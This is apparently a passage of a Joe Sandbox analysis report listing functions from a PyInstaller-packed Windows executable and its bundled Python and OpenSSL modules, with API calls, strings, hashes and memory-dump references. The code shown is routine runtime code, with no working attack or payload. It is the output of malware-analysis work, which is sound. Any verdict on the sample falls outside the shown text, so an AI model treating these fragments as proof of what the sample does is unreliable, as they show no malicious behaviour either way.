TranslateMessage.USER32 ref: 00007FF79A318E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318E41
PeekMessageW.USER32 ref: 00007FF79A318E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A318FF4
GetExitCodeProcess.KERNEL32 ref: 00007FF79A319009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A319012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF79A313F7F), ref: 00007FF79A31901F

Strings

PyInstaller Onefile Hidden Window, xrefs: 00007FF79A318D85
Failed to create child process!, xrefs: 00007FF79A318D20
CreateProcessW, xrefs: 00007FF79A318D27
PyInstallerOnefileHiddenWindow, xrefs: 00007FF79A318D44

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 05c46e7c3f19d902a82c6ca35d0ffc88125f0170587f6fbf4177c0ea1be8c11b
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 11D16032E0AA8286F720EF74E8542A9B760FB84B58FC0427DEA5D42A94DF3CD545C754

Function 00007FFEDD235A98 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 364COMMON

Download Yara Rule

APIs

00007FFEF5CE1E30.VCRUNTIME140 ref: 00007FFEDD235C33

Strings

email, xrefs: 00007FFEDD235EAA
Unknown general name type %d, xrefs: 00007FFEDD235BCB
failed to allocate BIO, xrefs: 00007FFEDD235AF9
Invalid value %.200s, xrefs: 00007FFEDD235F9C
URI, xrefs: 00007FFEDD235E98
Registered ID, xrefs: 00007FFEDD235CB7
DNS, xrefs: 00007FFEDD235EA1
DirName, xrefs: 00007FFEDD235E47
%d.%d.%d.%d, xrefs: 00007FFEDD235D6F
<INVALID>, xrefs: 00007FFEDD235CF0
<invalid>, xrefs: 00007FFEDD235E26
%X:%X:%X:%X:%X:%X:%X:%X, xrefs: 00007FFEDD235E14
IP Address, xrefs: 00007FFEDD235D33

Memory Dump Source

Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true

Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd

Similarity

API ID: 00007
String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
API String ID: 3568877910-4109427827
Opcode ID: f3c89cab712f7899d68f9ad75fe1cd1ac2abf68c077fe45f7e17a93191ebbc8a
Instruction ID: f7fccc038658c36bc3a28d0ee9f6169587951729bf9a1d75893192718d2585fc
Opcode Fuzzy Hash: f3c89cab712f7899d68f9ad75fe1cd1ac2abf68c077fe45f7e17a93191ebbc8a
Instruction Fuzzy Hash: 1AF15622A08A8286EA758B25A85423D67A1FFC5B85F0C443BDE5E42EB4FF3DF454C700

Function 00007FF79A3183B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A31841B
RemoveDirectoryW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A31849E
DeleteFileW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184BD
FindNextFileW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184CB
FindClose.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184DC
RemoveDirectoryW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184E5

Strings

%s\*, xrefs: 00007FF79A3183E2

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: b245a6d5e6da75a0f844115528a7a28c14c3ff5ee32dd14997095a75ec9c24f9
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 62416221B0E54285FA70FB34E4495B9B360FB94754FC0067EE69D426D4DF3CD5468724

Function 00007FFEDD2330E8 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFEDD233104
RtlCaptureContext.KERNEL32 ref: 00007FFEDD233131
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFEDD23314B
RtlVirtualUnwind.KERNEL32 ref: 00007FFEDD23318C
IsDebuggerPresent.KERNEL32 ref: 00007FFEDD2331E0
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFEDD233201
UnhandledExceptionFilter.KERNEL32 ref: 00007FFEDD23320C

Memory Dump Source

Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true

Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 08efb2bdee9f98be2b3c6710b5812631814cf93b04d3daaf3e92c0f1bde12c4a
Instruction ID: f1634cded2b48513eebd50ac558753a9f28779a60aa26ea758ea58169d5729f1
Opcode Fuzzy Hash: 08efb2bdee9f98be2b3c6710b5812631814cf93b04d3daaf3e92c0f1bde12c4a
Instruction Fuzzy Hash: 53312C72609B8186EB709F60E8903ED7361FB84744F48443ADA8E47EA8EF3DD649C710

Function 00007FFEDD273398 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFEDD2733B4
RtlCaptureContext.KERNEL32 ref: 00007FFEDD2733E1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFEDD2733FB
RtlVirtualUnwind.KERNEL32 ref: 00007FFEDD27343C
IsDebuggerPresent.KERNEL32 ref: 00007FFEDD273490
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFEDD2734B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FFEDD2734BC

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 35a7589cc452a559f716fbf76e6c2d0995ef5bb5efcdcd1d759a878c2b8be3e9
Instruction ID: d028eb7b5da4b21bcbb839056e041013eaab2f3908d7395f9c347533c6ba78df
Opcode Fuzzy Hash: 35a7589cc452a559f716fbf76e6c2d0995ef5bb5efcdcd1d759a878c2b8be3e9
Instruction Fuzzy Hash: 3B314C76619B819AEB708F60E8507ED7370FB84754F48443ADA4E47AA4EF3CD648C700

Function 00007FF79A31D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF79A31D1B8
RtlCaptureContext.KERNEL32 ref: 00007FF79A31D1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF79A31D1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF79A31D240
IsDebuggerPresent.KERNEL32 ref: 00007FF79A31D294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF79A31D2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF79A31D2BC

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: 20b701dc6ffc5b028bacd0d82e696e89ffd76408bc77ba66904c324212a735c3
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: DE311D72A0AA8186FB709F60E8443EEB364FB85744F84453EDA4E47B94EF38D548C720

Function 00007FF79A335C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF79A335CB5

Part of subcall function 00007FF79A335608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33561C

Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8

Part of subcall function 00007FF79A32A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79A32A94F,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32A979
Part of subcall function 00007FF79A32A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79A32A94F,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32A99E

_get_daylight.LIBCMT ref: 00007FF79A335CA4

Part of subcall function 00007FF79A335668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33567C

_get_daylight.LIBCMT ref: 00007FF79A335F1A
_get_daylight.LIBCMT ref: 00007FF79A335F2B
_get_daylight.LIBCMT ref: 00007FF79A335F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79A33617C), ref: 00007FF79A335F63

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction ID: 3b484ac50d4e111ac76a3f2ab287e26252b5ff5c68401f3e8781e938fc4dcac7
Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction Fuzzy Hash: 63D1AD22E0E2428AFB30BF36D8511B9B6A1EF44784FC0917EEA4D47A95DF3CE4418760

Function 00007FF79A32A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF79A32A6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF79A32A715
RtlVirtualUnwind.KERNEL32 ref: 00007FF79A32A750
IsDebuggerPresent.KERNEL32 ref: 00007FF79A32A789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF79A32A793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF79A32A79E

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 7a3959de93039282e157ae04f5481e05272fd7b9dbb69084736715d6bd93dca3
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 36315E32A19B8186EB60DF35E8442AEB3A4FB89754F94027EEA8D43B54DF3CC1458B10

Function 00007FFEDD273AD0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 181networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FFEDD273AFA
00007FFEFBBC3440.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFEDD273B1E

Strings

surrogatepass, xrefs: 00007FFEDD273CDC
NOO, xrefs: 00007FFEDD273CF1
unsupported address family, xrefs: 00007FFEDD273D10

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: 00007C3440ErrorLast
String ID: NOO$surrogatepass$unsupported address family
API String ID: 3556311781-472101058
Opcode ID: 379f0d8483181ee031b79a6958d76256660427ce1b6611028b8dd15b66d8b172
Instruction ID: 411d1d2d4058c9137794212e4cd97d27be9bbf7a57f2ca71842f1db323d7a56a
Opcode Fuzzy Hash: 379f0d8483181ee031b79a6958d76256660427ce1b6611028b8dd15b66d8b172
Instruction Fuzzy Hash: 96816032E09752A1EA358B25A44427D63A0FFD5BA0F285136DE5E42BB4FF3DE581C700

Function 00007FF79A3318E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A331930
FindFirstFileExW.KERNEL32 ref: 00007FF79A331A3A

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction ID: b0ff41ac84198448cbcf2568e0ac2fe20c8b03adda14bb607e648aef98ac31ab
Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction Fuzzy Hash: B0B17F22F1E69642FE71AB7294001B9F291AB44BE4FC4517DEE5E07B99EF7CE4418320

Function 00007FF79A335EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF79A335F1A

Part of subcall function 00007FF79A335668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33567C

_get_daylight.LIBCMT ref: 00007FF79A335F2B

Part of subcall function 00007FF79A335608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33561C

_get_daylight.LIBCMT ref: 00007FF79A335F3C

Part of subcall function 00007FF79A335638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33564C

Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79A33617C), ref: 00007FF79A335F63

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction ID: 37bb2e31aadd618a36d41bc34ce82cdb919f596565e8e273e8dc3f1907308c56
Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction Fuzzy Hash: 15514E22E1E6428AF730FF36D8915A9F760AB48784FC5917DEA4D43A96DF3CE4408760

Function 00007FFEDD23BADC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 215COMMON

Download Yara Rule

APIs

00007FFEDCBF1C3A.LIBSSL-3 ref: 00007FFEDD23BBD0

Strings

Cannot create a server socket with a PROTOCOL_TLS_CLIENT context, xrefs: 00007FFEDD23BB24
Cannot create a client socket with a PROTOCOL_TLS_SERVER context, xrefs: 00007FFEDD23BB6A

Memory Dump Source

Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true

Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd

Similarity

API ID: 00007
String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context
API String ID: 3568877910-1683031804
Opcode ID: 6805dc30597dff21a4c173714841e7ce727ae3a140b818bf0894f314996c17d8
Instruction ID: c327b5d0807f2bea31a7431f8e51892f16150c09d6eb663b15f06ed647a7e2e5
Opcode Fuzzy Hash: 6805dc30597dff21a4c173714841e7ce727ae3a140b818bf0894f314996c17d8
Instruction Fuzzy Hash: BDA12876A08B4686EA749F26E84452E63A1FFC5B94B08453ACE4E43F74EF3DF4568700

Function 00007FFEDD276080 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

listen.WS2_32 ref: 00007FFEDD2760D7

Strings

|i:listen, xrefs: 00007FFEDD27609C

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: listen
String ID: |i:listen
API String ID: 3257165821-1087349693
Opcode ID: d73e7bed6c837c4b4ef10a9ebc127bc551d6f2eb05c53b64dd527b498aa8359c
Instruction ID: 4dd1cdb1b243cad1a3cfe94d51c134117736e7c18afae45ccf24a77a0b873f6e
Opcode Fuzzy Hash: d73e7bed6c837c4b4ef10a9ebc127bc551d6f2eb05c53b64dd527b498aa8359c
Instruction Fuzzy Hash: 9C010021A18B4292EB709B66E88416E7361FFC9BA1B184136DA8E43F34EF3CD4448740

Function 00007FF79A315820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315830
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315842
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315879
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31588B
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158A4
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158B6
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158CF
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158E1
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158FD
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31590F
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31592B
GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31593D
GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315959
